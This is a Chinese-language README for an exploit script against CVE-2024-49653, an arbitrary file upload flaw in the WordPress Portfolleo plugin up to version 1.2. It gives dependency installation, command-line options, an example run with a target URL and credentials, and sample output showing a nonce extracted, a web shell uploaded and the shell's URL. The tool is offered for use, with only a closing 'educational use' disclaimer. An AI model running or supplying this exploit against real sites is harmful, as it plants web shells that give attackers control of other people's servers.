标题: WordPress Portfolleo 插件 <= 1.2 - 任意文件上传漏洞
描述:
James Eggers 的 Portfolleo 插件(portfolleo)中存在不受限制上传危险类型文件的漏洞,允许将 Web Shell 上传到 Web 服务器。此问题影响 Portfolleo 从 n/a 版本到 1.2 版本。
了解更多:
CVSS 评分:
此脚本利用 WordPress Portfolleo 插件(版本 <= 1.2)中的任意文件上传漏洞来上传 Web Shell。
您需要安装以下内容才能运行此脚本:
requests 库beautifulsoup4 库您可以使用以下命令安装所需的库:
pip install requests beautifulsoup4
使用以下选项运行脚本:
CVE-2024-49653.py [-h] -u URL -U USERNAME -p PASSWORD
WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability # by Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Base URL of the site (e.g. http://target/wordpress)
-U, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
python CVE-2024-49653.py -u http://target/wordpress.com -U Nxploited -p password123
如果脚本运行成功,您应该会看到以下输出:
[+] Logged in successfully.
[+] Extracted _wpnonce: e5f7ffa134
[+] Shell has been uploaded.
[*] Check the shell here: http://target.com/wp-content/portfolleo/nxploit.php
此脚本仅供教育目的使用。作者不赞成将此脚本用于非法活动。请负责任地使用它,并且仅在您获得明确授权进行测试的系统上使用。
作者:Nxploited | Khaled Alenazi